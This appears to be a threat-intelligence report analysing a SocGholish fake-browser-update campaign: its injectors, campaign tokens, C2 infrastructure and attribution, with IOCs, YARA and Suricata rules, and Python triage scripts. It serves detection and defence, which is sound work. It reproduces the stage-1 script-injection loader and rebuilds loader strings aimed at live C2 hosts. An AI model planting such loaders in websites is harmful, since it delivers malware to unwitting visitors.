Severity: High | Category: Phishing

SocGholish March 2026 Wave: 11 Injectors, 6 C2 Domains, and the Shared Campaign Tokens That Linked Them All

Published: March 12, 2026
Threat Actors: SocGholish (FakeUpdates)
Tags: phishing, socgholish, cobalt-strike, c2, ransomware, exploit, iot

TL;DR: A coordinated SocGholish (FakeUpdates) campaign wave launched 2026-03-02 deployed 11 stage-1 JavaScript injectors across 6 distinct C2 domains hosted by 4 providers spanning Panama, the United States, and Canada. Analysis of the base64 campaign tokens embedded in the URL paths shows that multiple frontend domains are served by a single backend -- one token reused across 2 domains and 4 samples was the linchpin. The actor compromised 4 legitimate websites, obtained wildcard TLS certificates for three of them (in one case just 2 days before go-live), which requires DNS-level validation and therefore indicates DNS-level control, and parked one C2 node in a Panama /24 shared with Tor exits, underground forums, and a cluster of suspicious analytics domains that may serve as the SocGholish traffic distribution system. The operation is attributed with HIGH confidence to TA569, the initial access broker that sells footholds to Evil Corp affiliates and ransomware operators.


Why SocGholish Still Matters

SocGholish is not new. It has been operating since at least 2017. But it remains one of the most effective initial access operations on the internet because it weaponizes trust -- legitimate websites that victims already visit, browser update prompts that look exactly right, and infrastructure that blends into normal web traffic. Every SocGholish infection is a door opened for whoever is buying access that week. In 2024-2025, that meant Evil Corp affiliates deploying WastedLocker, Cobalt Strike operators establishing persistence, and NetSupport RAT campaigns harvesting credentials at scale.

This report covers a previously unreported campaign batch -- 11 samples, zero prior public reporting -- uploaded to MalwareBazaar on 2026-03-02 by researcher JAMESWT_WT. We mapped the full infrastructure, linked the domains through shared campaign tokens, identified 4 compromised organizations, and uncovered a suspicious analytics domain cluster that may be part of SocGholish's traffic distribution system.

The Attack Chain

The SocGholish kill chain is deceptively simple. That simplicity is the point -- every stage uses legitimate web technologies, and no stage triggers behavioral detection until the victim manually executes the payload.

[Compromised Website]         [Victim Browser]           [SocGholish C2]
       |                            |                          |
       |  1. Injected <script>      |                          |
       |  tag (stage-1 JS)          |                          |
       |--------------------------->|                          |
       |                            |  2. HTTPS GET to         |
       |                            |  subdomain.victim.com/   |
       |                            |  [base64-campaign-token] |
       |                            |------------------------->|
       |                            |                          |
       |                            |  3. Browser fingerprint  |
       |                            |  (OS, browser, plugins)  |
       |                            |<-------------------------|
       |                            |                          |
       |                            |  4. Fake "Update Chrome" |
       |                            |  overlay served          |
       |                            |<-------------------------|
       |                            |                          |
       |                            |  5. Victim downloads     |
       |                            |  "Update.zip" containing |
       |                            |  .js/.lnk payload        |
       |                            |                          |
       |                            |  6. WScript execution    |
       |                            |  -> Stage-2 (CobaltStrike|
       |                            |  /NetSupport/Python RAT) |

Stage 1 is a tiny JavaScript IIFE injected into a compromised legitimate website. It creates a <script> tag pointing to an attacker-controlled subdomain. The injector is typically 235-270 bytes -- small enough to hide in minified theme files or plugin assets where it will never be noticed by the site owner.

Stage 2 serves a browser fingerprinting gate. The C2 evaluates the visitor's operating system, browser, plugins, and likely IP reputation before deciding whether to serve the fake update overlay or silently redirect to the legitimate page. One sample in this batch (b151cd35) includes an explicit OS: Win prefix -- a hardcoded gate restricting execution to Windows targets only.

Stage 3 presents a convincing fake browser update page. The victim downloads a ZIP containing a .js or .lnk file. Execution via WScript pulls a second-stage payload -- historically Cobalt Strike beacons, NetSupport RAT, or Python-based backdoors.

The Stage-1 Injectors: 11 Samples, One Pattern

All 11 samples follow an identical structure. The only variations are the parameter names (randomized per sample), the C2 domain, and the presence or absence of a gate variable.

// Gate variable (optional): var ndsx = true; or var qwzx = true;
// IIFE with 5-6 parameters:
(function(document_ref, tag_name, url, script_elem, first_script) {
    script_elem = document_ref.createElement(tag_name);
    first_script = document_ref.getElementsByTagName(tag_name)[0];
    script_elem.async = 1;
    script_elem.src = url;
    first_script.parentNode.insertBefore(script_elem, first_script);
})(document, 'script', 'https://[C2_DOMAIN]/[BASE64_CAMPAIGN_TOKEN]');

Two gate variables appear across the batch: ndsx and qwzx. These boolean flags are set to true and are likely checked by a parent SocGholish component to prevent double-injection on the same page. The split into two variables suggests sub-campaigns or operator segmentation -- different affiliates or delivery tracks using the same infrastructure.

Some variants pass window as the first IIFE parameter (unused in the function body), possibly reserved for future fingerprinting logic.

Sample Inventory

SHA256 (truncated)     Size (bytes)  Gate Var  C2 Domain
8f896f3f0b5f3341...    262           ndsx      editions.seattlemysterylovers[.]com
2f9e5ea05aa8cd81...    270           ndsx      editions.seattlemysterylovers[.]com
b151cd35a8aa986b...    259           qwzx      clients.dedicatedservicesusa[.]com
3862b771872c705c...    251           qwzx      clients.dedicatedservicesusa[.]com
dfc159e0987ac2ea...    253           ndsx      clients.dedicatedservicesusa[.]com
77ba87f9af573806...    248           ndsx      clients.dedicatedservicesusa[.]com
fce0b35eb3fa3db0...    238           --        circle.innovativecsportal[.]com
a06b40943b4e4d40...    239           --        dashnex.plexusmarket[.]fund
d0858a2d532c8bb3...    235           --        static.twalls5280[.]com
1140b0fb86f15608...    244           qwzx      support.traininghub[.]world
436a97f14051ed97...    239           qwzx      support.traininghub[.]world

Campaign Token Analysis: The Unifying Thread

The strongest evidence that these 6 domains share a single backend comes from the URL path tokens. Each injector fetches a base64-encoded path from its C2 domain. When the same token is served from different domains, that is strong evidence the domains are fronts for one backend: the token is a backend-issued campaign identifier, and a value generated by one frontend would be meaningless to another.

Token (URL Path)                                              Domains Using It                       Samples
/I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=            seattlemysterylovers                   1
/vKbEo8eEp8rYhP6RiZbogc6E/oHOwKPLxsK92czIotrV3rHI1dLm3g==    seattlemysterylovers                   1
/49U5SZj3WiCH9wN71uUVa5H3A2uAsFEwjaZdJo64SzvBqA==            traininghub, dedicatedservicesusa (x3) 4
/IWRDzFpGIKVFRnn+FFFv7lNGee5REzS4RQwyu1EBYbE=                traininghub, dedicatedservicesusa      2
/MkiUaUlq9wBWaq5bCnu4S0BqrktYMuYZRCD6AkQm9RtCOuwPVD76S08=    plexusmarket                           1
/Cqpi5HGIAY1uiFjWPJ5OxniIWMZt2BKReMkFiHvaAJB9yBqXZtBAmQ==    twalls5280                             1
/cL2QAwuf82oUn6oxR4S8IQKfqiEV2v1uB8rjaBTT+WEfz+dkUsA=        innovativecsportal                     1

The token /49U5SZj3Wi... is the smoking gun. It appears on 2 different domains (traininghub.world and dedicatedservicesusa.com) in 4 separate samples, and the /IWRDzFpG... token links the same pair a second time. The SocGholish TDS generates these tokens centrally, and any frontend domain can resolve them interchangeably. This is a domain-agnostic backend -- if one domain is burned, the others continue serving the same campaigns.
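The pivot described above can be scripted: pull the C2 URL out of each injector's trailing call, split it into host and token path, and group the parent domains by shared token. The block below is an added example and not part of the original report or its tooling. The hosts and tokens are the ones in this report, but the page does not say which sample carries which token, so the per-sample assignment in SAMPLES is illustrative and only reproduces the per-token counts; the injector bodies are constructed in the shape documented above with invented parameter names.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The injector's trailing call is (document, 'script', '<C2 URL>'), optionally with window first.
# Parameter names inside function(...) are randomized per sample, so only the call site is parsed.
IIFE_CALL = re.compile(
    r"\)\s*\(\s*(?:window\s*,\s*)?document\s*,\s*['\"]script['\"]\s*,\s*['\"](https?://[^'\"]+)['\"]"
)

def _injector(host, token, gate=None, with_window=False):
    """Constructed stage-1 injector in the shape documented above (not a real sample; names invented)."""
    params = "w,a,b,c,d,e" if with_window else "a,b,c,d,e"
    body = ("d=a.createElement(b);e=a.getElementsByTagName(b)[0];"
            "d.async=1;d.src=c;e.parentNode.insertBefore(d,e)")
    args = ("window," if with_window else "") + f"document,'script','https://{host}{token}'"
    return (f"var {gate} = true;" if gate else "") + f"(function({params}){{{body}}})({args});"

# Hosts and tokens are the ones in this report; which sample carries which token is not stated on
# the page, so the assignment below is illustrative (it reproduces the per-token counts only).
T49 = "/49U5SZj3WiCH9wN71uUVa5H3A2uAsFEwjaZdJo64SzvBqA=="
TIW = "/IWRDzFpGIKVFRnn+FFFv7lNGee5REzS4RQwyu1EBYbE="
SAMPLES = {
    "8f896f3f": _injector("editions.seattlemysterylovers.com", "/I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=", "ndsx"),
    "2f9e5ea0": _injector("editions.seattlemysterylovers.com", "/vKbEo8eEp8rYhP6RiZbogc6E/oHOwKPLxsK92czIotrV3rHI1dLm3g==", "ndsx"),
    "b151cd35": _injector("clients.dedicatedservicesusa.com", T49, "qwzx"),
    "3862b771": _injector("clients.dedicatedservicesusa.com", T49, "qwzx"),
    "dfc159e0": _injector("clients.dedicatedservicesusa.com", T49, "ndsx"),
    "77ba87f9": _injector("clients.dedicatedservicesusa.com", TIW, "ndsx"),
    "fce0b35e": _injector("circle.innovativecsportal.com", "/cL2QAwuf82oUn6oxR4S8IQKfqiEV2v1uB8rjaBTT+WEfz+dkUsA=", with_window=True),
    "a06b4094": _injector("dashnex.plexusmarket.fund", "/MkiUaUlq9wBWaq5bCnu4S0BqrktYMuYZRCD6AkQm9RtCOuwPVD76S08="),
    "d0858a2d": _injector("static.twalls5280.com", "/Cqpi5HGIAY1uiFjWPJ5OxniIWMZt2BKReMkFiHvaAJB9yBqXZtBAmQ=="),
    "1140b0fb": _injector("support.traininghub.world", T49, "qwzx"),
    "436a97f1": _injector("support.traininghub.world", TIW, "qwzx"),
}

def extract_c2(sample):
    """Return (host, token_path) from one injector, or None if it has no loader call."""
    m = IIFE_CALL.search(sample)
    if not m:
        return None
    url = urlsplit(m.group(1))
    return url.hostname, url.path  # path keeps the leading '/', matching the token table above

def registrable(host):
    """Collapse the C2 subdomain to its parent domain (naive last-two-labels split; fine for these IOCs)."""
    return ".".join(host.split(".")[-2:])

def link_domains(samples):
    """Pivot: domains that serve the same token are fronts for one backend.
    Returns (token -> domains, token -> sample count, domain clusters largest-first)."""
    token_domains, token_samples = defaultdict(set), defaultdict(int)
    for body in samples.values():
        hit = extract_c2(body)
        if hit is None:
            continue
        host, token = hit
        token_domains[token].add(registrable(host))
        token_samples[token] += 1
    parent = {}  # union-find over domains: two domains are linked if any token appears on both
    def find(d):
        parent.setdefault(d, d)
        while parent[d] != d:
            parent[d] = parent[parent[d]]
            d = parent[d]
        return d
    for doms in token_domains.values():
        first, *rest = sorted(doms)
        for d in rest:
            parent[find(d)] = find(first)
        find(first)
    clusters = defaultdict(set)
    for d in list(parent):
        clusters[find(d)].add(d)
    ordered = sorted((sorted(c) for c in clusters.values()), key=len, reverse=True)
    return dict(token_domains), dict(token_samples), ordered

def demo():
    return link_domains(SAMPLES)
```

Run against real samples, the same script gives the token table and the domain clusters directly; a cluster of size one is a domain that cannot yet be tied to the others by token evidence alone.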

Infrastructure: 5 Live IPs, 4 Providers, 3 Countries

Network Map

IP               ASN/Provider       Country  Domain                                Status
190.211.254.31   Private Layer Inc  PA       editions.seattlemysterylovers[.]com   LIVE (stealth)
141.193.213.10   Cloudflare CDN     US       clients.dedicatedservicesusa[.]com    LIVE (403)
45.76.250.221    Vultr              US       dashnex.plexusmarket[.]fund           LIVE (stealth)
45.32.199.48     Vultr              US       static.twalls5280[.]com               LIVE (stealth)
170.75.160.84    Lunanode           CA       circle.innovativecsportal[.]com       LIVE (stealth)
N/A              N/A                --       support.traininghub[.]world           DEAD (no DNS)

Four of the five live IPs resolve in DNS but return connection timeouts on direct probe -- selective C2 response that only serves content to requests matching the expected SocGholish beacon format. A timeout rather than a reset also fits a frontend that simply drops requests without the expected Host header and token path, so a silent probe does not mean the node is down. The fifth (141.193.213.10) sits behind Cloudflare CDN, returning a 403 on all direct requests; that address is a shared Cloudflare edge, not the origin, which is why it is left out of the IP-based network rule below. This is deliberate: Cloudflare fronting masks the true origin IP and provides DDoS protection and domain reputation laundering.

The multi-provider spread (Private Layer in Panama, two Vultr instances in the US, Lunanode in Canada, and Cloudflare CDN) eliminates any single point of failure. Taking down one provider leaves 4 of 5 C2 nodes operational.

Hosting Hierarchy

Tier 0 (Upstream Providers):
  Private Layer Inc (Panama)  -- 190.211.252.0/22
  Vultr/Constant Company (US) -- 45.32.0.0/16, 45.76.0.0/15
  Lunanode Hosting Inc (CA)   -- 170.75.160.0/20
  Cloudflare CDN (US)         -- 141.193.213.0/24

Tier 1 (C2 Infrastructure):
  190.211.254.31 -- editions.seattlemysterylovers[.]com
  141.193.213.10 -- clients.dedicatedservicesusa[.]com (CF proxy)
  45.76.250.221  -- dashnex.plexusmarket[.]fund
  45.32.199.48   -- static.twalls5280[.]com
  170.75.160.84  -- circle.innovativecsportal[.]com

Tier 2 (Compromised Redirectors):
  162.241.30.122 -- seattlemysterylovers[.]com (Bluehost, legit site)
  WP Engine      -- dedicatedservicesusa[.]com (WordPress, legit business)
  Apache         -- innovativecsportal[.]com (Alpha Five, legit portal)

Certificate Preparation: The 48-Hour Window

The wildcard certificate timeline reveals the actor's operational cadence. Infrastructure is prepared in the days before campaign launch -- 2 days for the one domain with a clean pre-launch issuance -- enough time to validate DNS propagation and test C2 connectivity, but short enough to minimize exposure.

  • dedicatedservicesusa[.]com: Wildcard cert (*.dedicatedservicesusa.com) issued 2026-02-28 via Let's Encrypt E7. Campaign launched 2026-03-02. This is a 48-hour preparation window.
  • twalls5280[.]com: Recurring wildcard certs since 2025-09, with a specific static.twalls5280.com cert from ZeroSSL (2025-09-13). This node has been in the SocGholish infrastructure for at least 6 months.
  • innovativecsportal[.]com: Wildcard cert renewed 2026-03-07 (Sectigo + Google Trust). Also has a server.innovativecsportal.com cert from cPanel, indicating the legitimate admin's control panel is still accessible.
  • plexusmarket[.]fund: Wildcard certs since 2025-09-27 (Google Trust + Sectigo). Another long-lived node.
  • seattlemysterylovers[.]com: No certificate observed for the editions subdomain. The actor is likely using HTTP-only or direct IP communication for this node.

The issuance of wildcard certificates (*.domain.com) rather than single-subdomain certificates indicates the actor has DNS-level control over the compromised domains -- not just the ability to inject JavaScript into a web page. A CA will not validate a wildcard by a file placed on the web server; it requires proof of control at the DNS level (for Let's Encrypt, the DNS-01 challenge, which means writing a TXT record under _acme-challenge.<domain>). This is a deeper compromise than typical SocGholish web injection and indicates the actor likely controls the DNS registrar account or nameserver configuration. The alternative to rule out is a hosting panel or CDN that auto-issues wildcards on the owner's behalf; the 48-hour alignment between issuance and campaign launch for dedicatedservicesusa[.]com argues against that there, but the recurring wildcards on twalls5280[.]com should be compared against the site's pre-compromise certificate history before being counted as attacker activity.

The Panama /24: Tor Exits, Underground Forums, and Suspicious Analytics

The Private Layer /24 (190.211.254.0/24) hosting the primary C2 at .31 is a neighborhood worth watching. A scan of the surrounding IPs reveals co-hosted infrastructure that paints a clear picture of the provider's clientele:

IP              Hostname               Significance
.30             c4mhub[.]com           Adult content platform
.40             nulled[.]ws            Underground hacking forum
.44             wwstat[.]co            Suspicious analytics/tracking domain
.48/.164        yahoo.com (spoofed)    Apache Traffic Server spoofing Yahoo
.55/.66         *.missilesflee[.]de    Suspicious domain cluster
.76/.101/.182   (tor)                  Tor exit/relay nodes
.93             maxstat[.]co           Suspicious analytics domain
.94             cdnmetrics[.]co        Suspicious CDN/analytics domain
.120            neutrinosbeat[.]com    Suspicious domain
.123            cdnscore[.]co          Suspicious CDN/analytics domain
.139            cloud-mgmt-app[.]com   Suspicious cloud management domain

The cluster of analytics-style domains -- wwstat[.]co, maxstat[.]co, cdnmetrics[.]co, cdnscore[.]co -- in the same /24 as the SocGholish C2 is the most operationally interesting finding, but the evidence for it is co-location only: none of the 11 injectors references these hosts, and we observed no redirect through them. These domains mimic legitimate web analytics and CDN services. They may serve as components of SocGholish's Traffic Distribution System (TDS) -- the fingerprinting and conditional redirection layer that decides which visitors receive the fake update overlay and which are silently passed through to the legitimate page. Treat them as watchlist candidates rather than confirmed indicators.

Compromised Organizations

SocGholish does not target specific organizations for compromise. It opportunistically compromises websites with known CMS vulnerabilities -- primarily WordPress -- and uses them as delivery platforms to infect their visitors. The true victims are the employees, contractors, and partners who visit these sites during normal business operations.

Organization                        Domain                        Sector                 Evidence
Seattle Mystery Lovers Book Club    seattlemysterylovers[.]com    Community/Recreation   DNS hijack of editions subdomain to attacker IP
Dedicated Building Services         dedicatedservicesusa[.]com    Construction/Services  WordPress injection, wildcard cert issued by attacker
Innovative Customer Service (ICS)   innovativecsportal[.]com      Business Services      DNS hijack of circle subdomain, open directory listing
TWalls5280                          twalls5280[.]com              Home Improvement       DNS hijack of static subdomain, recurring wildcard certs

The compromised sites span small business, community, and service sectors -- organizations unlikely to have security teams monitoring their DNS records or Certificate Transparency logs. This is by design. SocGholish targets the long tail of the web, where compromises persist for months without detection.

Threat Actor: TA569

Attribute      Assessment
Designation    TA569 (Proofpoint) / GOLD PRELUDE (Secureworks) / GhoLoader
Confidence     HIGH
Motivation     Financial -- initial access brokerage
Region         Likely Eastern Europe (historical attribution; no new geographic evidence from this campaign)
Active Since   At least 2017

TA569 operates as an initial access broker (IAB). They do not deploy ransomware or conduct espionage themselves. They compromise machines at scale and sell the resulting footholds to the highest bidder. Known downstream relationships include:

Downstream Actor             Payload                            Relationship
Evil Corp / Indrik Spider    WastedLocker, Hades ransomware     Primary customer
UNC2726 / GOLD PRELUDE       Cobalt Strike beacons              Direct deployment
Unknown affiliates           NetSupport RAT                     Common second-stage
Unknown affiliates           Python backdoor (Blister loader)   Observed in 2024-2025
Various RaaS operators       LockBit, BlackCat/ALPHV            Suspected access sales

OPSEC Failures We Exploited

The actor's operational security is generally strong -- multi-provider infrastructure, Cloudflare fronting, selective C2 response, and short-lived subdomains on compromised domains. But several failures enabled this mapping:

  1. Same campaign tokens reused across domains -- the /49U5SZj3Wi... token appearing on 2 different domains (traininghub.world and dedicatedservicesusa.com) in 4 samples tied both frontends to one backend
  2. All 11 samples submitted in a single batch -- enabling full campaign mapping from one researcher's upload
  3. Wildcard cert issuance dates -- the dedicatedservicesusa[.]com wildcard, issued 48 hours before launch, fixed the preparation window; the long-lived wildcards on twalls5280[.]com and plexusmarket[.]fund dated the older nodes
  4. innovativecsportal[.]com has open directory listing -- exposed the underlying Alpha Five platform
  5. plexusmarket[.]fund redirects to dashnexpages.com -- revealed the DashNex page builder used for the purpose-registered domain
  6. Private Layer /24 neighborhood -- co-hosted suspicious analytics domains suggest TDS infrastructure

MITRE ATT&CK Mapping

Tactic                 Technique                                       ID         Implementation
Resource Development   Compromise Infrastructure: Web Services         T1584.006  Compromised WordPress/Alpha Five sites for JS injection
Resource Development   Stage Capabilities: Upload Malware              T1608.001  Stage-1 JS injector planted on compromised sites
Resource Development   Acquire Infrastructure: Domains                 T1583.001  Purpose-registered plexusmarket.fund, traininghub.world
Initial Access         Drive-by Compromise                             T1189      Visitors to compromised sites auto-load malicious JS
Execution              Command and Scripting Interpreter: JavaScript   T1059.007  JS IIFE loader creates script tag
Execution              User Execution: Malicious File                  T1204.002  Victim downloads fake update .zip/.js
Command and Control    Application Layer Protocol: Web Protocols       T1071.001  HTTPS communication with C2 domains
Command and Control    Ingress Tool Transfer                           T1105      Stage-2 payload download from C2
Defense Evasion        Obfuscated Files or Information                 T1027      Minified JS with variable randomization

Indicators of Compromise

C2 Domains

editions[.]seattlemysterylovers[.]com
support[.]traininghub[.]world
clients[.]dedicatedservicesusa[.]com
dashnex[.]plexusmarket[.]fund
static[.]twalls5280[.]com
circle[.]innovativecsportal[.]com

C2 IPs

190.211.254.31    (Private Layer, Panama)
141.193.213.10    (Cloudflare CDN, US)
45.76.250.221     (Vultr, US)
45.32.199.48      (Vultr, US)
170.75.160.84     (Lunanode, Canada)

Potential TDS/Analytics Infrastructure (190.211.254.0/24)

190.211.254.44    wwstat[.]co
190.211.254.93    maxstat[.]co
190.211.254.94    cdnmetrics[.]co
190.211.254.123   cdnscore[.]co
files[.]jeaniescott[.]digital
login[.]craftyinkymagic[.]com
cpanel[.]grovecityhvacservices[.]com
disk[.]grovecitykitchenremodeling[.]com
feedback[.]grovecitypestcontrol[.]com
customer[.]grovecityroofing[.]com
support[.]grovecityelectrician[.]com
images[.]grovecityshoplocal[.]com

File Indicators

SHA256                                                            MD5                               Size
8f896f3f0b5f33413217e9350dba6d4958cc9bdf568902a08d739b43db6f993b  27965f46c2d16af746efeb8e1fc30025  262
2f9e5ea05aa8cd81c1c1f0914220557c5dc4a8bc42ee822bd327e3cfc3328f45  9cbad5646c877218af29fd6cc88849c4  270
b151cd35a8aa986bd6bd6f2148fd9ca37e2953e823d658c088923b49e87b4035  737fc3173073fea6d9d12ec586253f1f  259
3862b771872c705cb757d851d7714de369cbf8db548d8dcac7edcc46933045e0  e0e2a64bba76b50b433c1ae8e89a7d9d  251
dfc159e0987ac2ea946fd45fa61f81d828a5302d02d53dd7cf88cefefc79c316  5bedabab8dddaf03ee75c14e1e5c9ff9  253
77ba87f9af5738061a9e5b8b8ad3119c2896188928283112dfd0d1882a6a347d  f3ee929efd197e62d04cba85efd8fcb5  248
fce0b35eb3fa3db05e5c6532705758a8669d5bb6fc1825175c0ee67bbbd38862  bb959c89922c3ef6be5105742ea7b94f  238
a06b40943b4e4d4057756a456e7016b3eae69eeb2c4b1311ce53f5fd9dd7cefa  2e7ab628a4465e21da618eedd59bcd14  239
d0858a2d532c8bb3bdd8f98ff78c2c16da33c171815aa5c89ffeb84ee76b8cf5  2bb853e2d71d314ffc5419ca3fc80a06  235
1140b0fb86f156087d9886e61e8d0c5a3a74ce73648fda609d507e6802b9af5e  19d9d3c663fe2a147b2683895adb20a1  244
436a97f14051ed97063c9b2e12a25b0068984a0ebe164001e51615539561e64e  7e0d41fc10cfa7b0047546a932f2be62  239

Behavioral Indicators

Gate variables in HTML source:  var ndsx = true;
                                var qwzx = true;

IIFE pattern:  (function( ... createElement ... getElementsByTagName ... insertBefore ... .async=1 ... .src=

URL paths:     Base64-like tokens with = padding
               e.g., /I8l9JljrHk9H60cUFvxRBFHrRwRLqxNHRq4MU025DklN6wA=

OS gate:       "OS: Win" string prefix in some variants

Detection Opportunities

YARA Rules

rule SocGholish_Stage1_IIFE_Injector_Mar2026 {
    meta:
        description = "Detects SocGholish stage-1 IIFE JavaScript injectors from March 2026 campaign"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        // 5 or 6 parameters: some variants pass window as an unused first argument
        $iife_open = /\(function\s*\((\s*\w+\s*,){4,5}\s*\w+\s*\)/
        $create = "createElement" ascii
        $gettag = "getElementsByTagName" ascii
        $insert = "insertBefore" ascii
        $async = ".async" ascii
        $src = ".src" ascii
        $gate1 = "var ndsx" ascii
        $gate2 = "var qwzx" ascii
        $c2_1 = "seattlemysterylovers" ascii nocase
        $c2_2 = "dedicatedservicesusa" ascii nocase
        $c2_3 = "plexusmarket" ascii nocase
        $c2_4 = "twalls5280" ascii nocase
        $c2_5 = "innovativecsportal" ascii nocase
        $c2_6 = "traininghub" ascii nocase
    condition:
        // The size guard must wrap every clause: 'and' binds tighter than 'or' in YARA, so without
        // the parentheses the gate-variable and domain strings would fire on files of any size.
        // Every declared string is referenced; YARA refuses to compile a rule with unused strings.
        filesize < 500 and
        (
            ($iife_open and $create and $gettag and $insert and $async and $src) or
            any of ($gate*) or
            any of ($c2_*)
        )
}

rule SocGholish_Generic_IIFE_Loader {
    meta:
        description = "Generic detection for SocGholish IIFE script injection pattern"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:CLEAR"
    strings:
        // 5 or 6 short (1-3 char) parameter names, as in the minified samples
        $iife = /\(function\s*\((\s*\w{1,3}\s*,){4,5}\s*\w{1,3}\s*\)/
        $create = "createElement" ascii
        $tag = "'script'" ascii
        $insert = "insertBefore" ascii
        $async = ".async" ascii
    condition:
        filesize < 500 and
        all of them
}

Suricata Rules

# SocGholish -- March 2026 C2 domains
alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"seattlemysterylovers"; \
  sid:2026030901; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"dedicatedservicesusa"; \
  sid:2026030902; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"plexusmarket"; \
  sid:2026030903; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"innovativecsportal"; \
  sid:2026030904; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"twalls5280"; \
  sid:2026030905; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH C2 Domain Lookup (Mar 2026)"; \
  dns.query; content:"traininghub.world"; \
  sid:2026030906; rev:1;)

# SocGholish -- Potential TDS analytics domains in Panama /24
alert dns any any -> any any (msg:"SOCGHOLISH Potential TDS Domain (Panama /24)"; \
  dns.query; content:"wwstat.co"; \
  sid:2026030907; rev:1;)

alert dns any any -> any any (msg:"SOCGHOLISH Potential TDS Domain (Panama /24)"; \
  dns.query; content:"cdnmetrics.co"; \
  sid:2026030908; rev:1;)

# SocGholish -- C2 IP direct connections
alert ip any any -> [190.211.254.31,45.76.250.221,45.32.199.48,170.75.160.84] any \
  (msg:"SOCGHOLISH C2 IP Connection (Mar 2026)"; \
  sid:2026030909; rev:1;)

Hunting Queries

DNS/Proxy Log Hunting -- search for any connections to the 6 C2 subdomains or base parent domains. Also search for the base64 URL path patterns with = padding in HTTP request URIs.

Certificate Transparency Monitoring -- set alerts for new certificate issuance on all 6 domains. A new subdomain certificate (e.g., mail.dedicatedservicesusa.com) would indicate the actor is expanding or rotating C2 endpoints.
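The certificate triage in the Certificate Preparation section and the Certificate Transparency hunt above can be scripted against crt.sh-style output: flag any wildcard issued on a campaign domain (wildcards require DNS-level validation, so issuance is a DNS-control signal), score it by distance from the launch date, and flag any hostname outside the owner's known set. The block below is an added example and not part of the original report. It assumes entries in the JSON shape crt.sh returns (issuer_name, newline-separated name_value, not_before), an assumed owner baseline of known hostnames, and a seven-day staging window; the wildcard row reflects the dedicatedservicesusa[.]com issuance in this report, and the other two rows are constructed.

```python
import json
from datetime import datetime, date

# Constructed entries in the JSON shape crt.sh returns (issuer_name, newline-separated name_value,
# not_before). Row 1 reflects the dedicatedservicesusa wildcard from this report; rows 2-3 are invented.
CT_JSON = """[
 {"issuer_name": "C=US, O=Let's Encrypt, CN=E7",
  "name_value": "*.dedicatedservicesusa.com\\ndedicatedservicesusa.com",
  "not_before": "2026-02-28T09:14:02"},
 {"issuer_name": "C=US, O=Let's Encrypt, CN=R11",
  "name_value": "www.dedicatedservicesusa.com",
  "not_before": "2025-12-01T00:00:00"},
 {"issuer_name": "C=GB, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA",
  "name_value": "mail.dedicatedservicesusa.com",
  "not_before": "2026-03-11T12:00:00"}
]"""

WATCHED = {"dedicatedservicesusa.com"}                                      # all 6 campaign domains in practice
KNOWN_HOSTS = {"dedicatedservicesusa.com", "www.dedicatedservicesusa.com"}  # assumed owner baseline
CAMPAIGN_LAUNCH = date(2026, 3, 2)
STAGING_WINDOW_DAYS = 7  # a wildcard issued this close before launch is treated as pre-staging

def registrable(name):
    """Parent domain of a SAN entry, wildcard prefix removed (naive last-two-labels split)."""
    return ".".join(name.lower().lstrip("*.").split(".")[-2:])

def triage_ct(entries, watched, known_hosts, launch):
    """Flag, per SAN on a watched domain: wildcard issuance (DNS-level validation => DNS control)
    and hostnames outside the owner's baseline. Earliest-issued findings come first."""
    findings = []
    for e in entries:
        issued = datetime.fromisoformat(e["not_before"]).date()
        days_before = (launch - issued).days  # negative = issued after launch
        for name in e["name_value"].split("\n"):
            name = name.strip().lower()
            if registrable(name) not in watched:
                continue
            if name.startswith("*."):
                findings.append({"kind": "wildcard", "name": name, "issuer": e["issuer_name"],
                                 "days_before_launch": days_before,
                                 "pre_staged": 0 <= days_before <= STAGING_WINDOW_DAYS})
            elif name not in known_hosts:
                findings.append({"kind": "new-host", "name": name, "issuer": e["issuer_name"],
                                 "days_before_launch": days_before, "pre_staged": False})
    return sorted(findings, key=lambda f: -f["days_before_launch"])

def demo():
    return triage_ct(json.loads(CT_JSON), WATCHED, KNOWN_HOSTS, CAMPAIGN_LAUNCH)
```

A wildcard with pre_staged set is the signal worth paging on; a new-host finding after launch (mail.dedicatedservicesusa.com in the constructed data) is the rotation case the hunt above describes, and the owner's baseline is what keeps routine renewals out of the queue.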

JavaScript Content Inspection -- search web proxy logs or WAF telemetry for the IIFE injection pattern: createElement + getElementsByTagName + insertBefore + .async=1 appearing in responses from external websites, especially when the total script block is under 300 bytes.
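The IIFE pattern above is the same idiom legitimate tag managers and analytics loaders use, so a hunt on createElement + insertBefore + .async alone is noisy. What separates the SocGholish loader is the fetched URL: a bare base64 token path with no directory, file name or extension. The block below is an added example, not part of the original report; it classifies every async-loader IIFE in a page body and is run here on a constructed page containing a SocGholish-shaped injector (real C2 host and token from this report, invented parameter names) next to a benign-looking loader on an invented host, cdn.example-analytics.invalid.

```python
import re
from urllib.parse import urlsplit

# One async-loader IIFE: (function(params){body})(args);  -- the shape of both the SocGholish injector
# and many legitimate tag loaders, which is exactly why the pattern alone is a noisy hunt.
LOADER = re.compile(
    r"\(function\s*\([^)]*\)\s*\{(?P<body>[^}]*)\}\s*\)\s*\((?P<args>[^;]*?)\)\s*;?", re.S)
URL = re.compile(r"['\"](https?://[^'\"]+)['\"]")
# Bare base64 URL path: no directory name, no file name, no extension, optional '=' padding.
TOKEN_PATH = re.compile(r"^/[A-Za-z0-9+/]{16,}={0,2}$")
MAX_LOADER_BYTES = 300  # injectors in this wave are 235-270 bytes

def classify_loaders(script_text):
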